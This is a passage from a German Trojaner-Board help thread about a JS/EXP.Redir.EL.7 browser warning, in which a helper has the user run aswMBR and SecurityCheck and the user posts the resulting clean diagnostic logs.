Wichtig: Drücke keinesfalls einen der Fix Buttons ohne Anweisung

Hinweis: Sollte der Scan Button ausgeblendet sein, schließe das Tool und starte es erneut. Sollte der Scan abbrechen und das Programm abstürzen, dann teile mir das mit und wähle unter AV Scan die Einstellung (none).



dann:

Downloade Dir bitte SecurityCheck und:

  • Speichere es auf dem Desktop.
  • Starte SecurityCheck.exe und folge den Anweisungen in der DOS-Box.
  • Wenn der Scan beendet wurde sollte sich ein Textdokument (checkup.txt) öffnen.
Poste den Inhalt bitte hier.
__________________
Mfg, t'john
Das TB unterstützen

Alt 12.06.2013, 19:07   #13
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Hallo t'john,

bei dem Scan mit aswMBR gibt es leider Probleme.

Nachdem er ca. 2 Minuten den scan durchführt bekomme ich eine Fehlermeldung.

"Das Programm wird aufgrund eines Problems nicht richtig ausgeführt. Das programm wird geschlossen und Sie werden benachricht wenn eine Lösung verfügbar ist"

Auch bei einem zweiten und dritten Versuch bricht der Scan ab.

Alt 14.06.2013, 08:04   #14
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Hast du den Hinweis beachtet?
__________________
Mfg, t'john
Das TB unterstützen

Alt 14.06.2013, 08:12   #15
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


aswMBR version 0.9.9.1771 Copyright(c) 2011 AVAST Software
Run date: 2013-06-14 09:13:01
-----------------------------
09:13:01.630 OS Version: Windows x64 6.1.7601 Service Pack 1
09:13:01.630 Number of processors: 4 586 0x2A07
09:13:01.630 ComputerName: CRUCRU-PC UserName: Crucru
09:13:04.110 Initialize success
09:13:11.973 AVAST engine defs: 13061300
09:13:16.216 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP4T0L0-8
09:13:16.216 Disk 0 Vendor: ST31000524AS JC4B Size: 953869MB BusType: 11
09:13:16.310 Disk 0 MBR read successfully
09:13:16.325 Disk 0 MBR scan
09:13:16.325 Disk 0 Windows 7 default MBR code
09:13:16.325 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 100 MB offset 2048
09:13:16.341 Disk 0 Partition 2 00 1B Hidd FAT32 NTFS 19024 MB offset 206848
09:13:16.341 Disk 0 Partition 3 00 07 HPFS/NTFS NTFS 381546 MB offset 39168000
09:13:16.388 Disk 0 Partition 4 00 07 HPFS/NTFS NTFS 553196 MB offset 820574244
09:13:16.419 Disk 0 scanning C:\windows\system32\drivers
09:13:26.684 Service scanning
09:13:42.331 Modules scanning
09:13:42.331 Disk 0 trace - called modules:
09:13:42.892 ntoskrnl.exe CLASSPNP.SYS disk.sys ataport.SYS PCIIDEX.SYS hal.dll asahci64.sys
09:13:42.892 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007ddc060]
09:13:42.892 3 CLASSPNP.SYS[fffff880019cf43f] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP4T0L0-8[0xfffffa800777b060]
09:13:42.908 Scan finished successfully
09:14:43.217 Disk 0 MBR has been saved successfully to "C:\Users\Crucru\Documents\MBR.dat"
09:14:43.217 The log file has been saved successfully to "C:\Users\Crucru\Documents\aswMBR.txt"


aswMBR version 0.9.9.1771 Copyright(c) 2011 AVAST Software
Run date: 2013-06-14 09:13:01
-----------------------------
09:13:01.630 OS Version: Windows x64 6.1.7601 Service Pack 1
09:13:01.630 Number of processors: 4 586 0x2A07
09:13:01.630 ComputerName: CRUCRU-PC UserName: Crucru
09:13:04.110 Initialize success
09:13:11.973 AVAST engine defs: 13061300
09:13:16.216 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP4T0L0-8
09:13:16.216 Disk 0 Vendor: ST31000524AS JC4B Size: 953869MB BusType: 11
09:13:16.310 Disk 0 MBR read successfully
09:13:16.325 Disk 0 MBR scan
09:13:16.325 Disk 0 Windows 7 default MBR code
09:13:16.325 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 100 MB offset 2048
09:13:16.341 Disk 0 Partition 2 00 1B Hidd FAT32 NTFS 19024 MB offset 206848
09:13:16.341 Disk 0 Partition 3 00 07 HPFS/NTFS NTFS 381546 MB offset 39168000
09:13:16.388 Disk 0 Partition 4 00 07 HPFS/NTFS NTFS 553196 MB offset 820574244
09:13:16.419 Disk 0 scanning C:\windows\system32\drivers
09:13:26.684 Service scanning
09:13:42.331 Modules scanning
09:13:42.331 Disk 0 trace - called modules:
09:13:42.892 ntoskrnl.exe CLASSPNP.SYS disk.sys ataport.SYS PCIIDEX.SYS hal.dll asahci64.sys
09:13:42.892 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007ddc060]
09:13:42.892 3 CLASSPNP.SYS[fffff880019cf43f] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP4T0L0-8[0xfffffa800777b060]
09:13:42.908 Scan finished successfully
09:14:43.217 Disk 0 MBR has been saved successfully to "C:\Users\Crucru\Documents\MBR.dat"
09:14:43.217 The log file has been saved successfully to "C:\Users\Crucru\Documents\aswMBR.txt"
09:15:35.201 Disk 0 MBR has been saved successfully to "C:\Users\Crucru\Documents\MBR.dat"
09:15:35.201 The log file has been saved successfully to "C:\Users\Crucru\Documents\aswMBR.txt"

Results of screen317's Security Check version 0.99.64
Windows 7 Service Pack 1 x64 (UAC is enabled)
Internet Explorer 10
``````````````Antivirus/Firewall Check:``````````````
Trend Micro Titanium Internet Security
Avira Desktop
Antivirus up to date! (On Access scanning disabled!)
`````````Anti-malware/Other Utilities Check:`````````
Adobe Flash Player 11.7.700.224
Adobe Reader 10.1.7 Adobe Reader out of Date!
Mozilla Firefox (21.0)
````````Process Check: objlist.exe by Laurent````````
Avira Antivir avgnt.exe
Avira Antivir avguard.exe
Trend Micro Titanium TiMiniService.exe
Trend Micro Titanium TiResumeSrv.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:
````````````````````End of Log``````````````````````

Antwort
Seite 1 von 2 1 2

Themen zu Java Script Virus JS/EXP.Redir.EL.7
admin, anlage, avira, deinstalliert, ergebnis, homepage, js/exp.redir.el.7, problem, programm, script, script virus, seite, unerwünschtes programm, virus


« GVU-Trojaner | Bundestrojaner »


Ähnliche Themen: Java Script Virus JS/EXP.Redir.EL.7


  1. Sparkasse Java Script Hack
    Plagegeister aller Art und deren Bekämpfung - 12.11.2014 (7)
  2. Währens trovigo-Virus-Entfernung Java-Virus Java/Exploit.Agent.OHY trojan entdeckt, den ich nicht loswerde.
    Plagegeister aller Art und deren Bekämpfung - 06.06.2014 (11)
  3. Bitte um Hilfe - Browser Spam/Pop Ups + Forum gehackt + Browserabstürtze + Java Script und Flashplayer-Probleme
    Log-Analyse und Auswertung - 19.10.2013 (21)
  4. Java-Virus (JAVA/Lamar.RI ; JAVA/Jogek.WK usw.)
    Log-Analyse und Auswertung - 18.06.2013 (12)
  5. Java-Scriptvirus JS/EXP.Redir.EL.7
    Plagegeister aller Art und deren Bekämpfung - 12.06.2013 (13)
  6. Hallo bin Liebe TB User. Habe Probleme mit Trojan.script.480412 & Java Agent DOA [TRJ] sowie andere
    Plagegeister aller Art und deren Bekämpfung - 09.05.2013 (3)
  7. Java-Virus JAVA/Dldr.Dermit.C, JAVA/Dldr.Kara.AB.1, JAVA/Dldr.Karame.AI
    Plagegeister aller Art und deren Bekämpfung - 06.11.2012 (1)
  8. Java-Virus JAVA/Tange.C, Java-Virus JAVA/Stutter.AI.3,...
    Log-Analyse und Auswertung - 07.10.2012 (14)
  9. Java Script Virus "JS/Run Forest.B
    Log-Analyse und Auswertung - 11.07.2012 (5)
  10. Java-Script Virus: Exploit: Java/CVE-2011-3544.gen!E
    Plagegeister aller Art und deren Bekämpfung - 04.05.2012 (13)
  11. Internet langsam (Java-Virus JAVA/ClassLoader.AV und Java-Virus JAVA/Exdoer.O)
    Log-Analyse und Auswertung - 01.03.2012 (1)
  12. TR/Agents, Java-Script-Viren und Malware --- HILFE!
    Log-Analyse und Auswertung - 01.02.2009 (0)
  13. TR/Agents, Java-Script-Viren und Malware
    Plagegeister aller Art und deren Bekämpfung - 31.01.2009 (0)
  14. Script-virus ?!
    Mülltonne - 19.11.2008 (0)
  15. Java script-Virus
    Log-Analyse und Auswertung - 01.10.2008 (5)
  16. Virus Java-Virus JAVA/Dldr.Agent.C gefunden; Bitte um Prüfung des Hijack Logfiles
    Log-Analyse und Auswertung - 24.07.2007 (3)
  17. Java Script ausgeschaltet und dieverse andere probleme... BITTE HELFT!!
    Plagegeister aller Art und deren Bekämpfung - 19.05.2005 (1)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Java Script Virus JS/EXP.Redir.EL.7 - Hallo Zusammen, seit gestern habe ich das Problem das ich nicht mehr auf unsere Homepage (www.sportschuetzen-oberhausen-1995ev.de) komme. Ich bin dort Admin und dauerhaft eingelogt. Ich bekomme den Hinweis In den - Java Script Virus JS/EXP.Redir.EL.7...
Archiv
Du betrachtest: Java Script Virus JS/EXP.Redir.EL.7 auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19